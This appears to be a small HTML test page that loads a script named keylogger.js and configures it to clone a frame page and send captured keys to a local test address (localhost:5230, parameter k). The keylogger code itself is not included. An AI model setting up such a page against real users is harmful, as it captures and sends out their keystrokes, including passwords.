﻿<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
    <script type="text/javascript" src="keylogger.js"></script>
    <script type="text/javascript">
        useClone = true;
        cloneDelay = 100;
        cloneSource = 'Test2_frame.htm';
        destination = 'http://localhost:5230/?k=';
    </script>
    <title>Test 2</title>
</head>
<body>
    Test
</body>
</html>
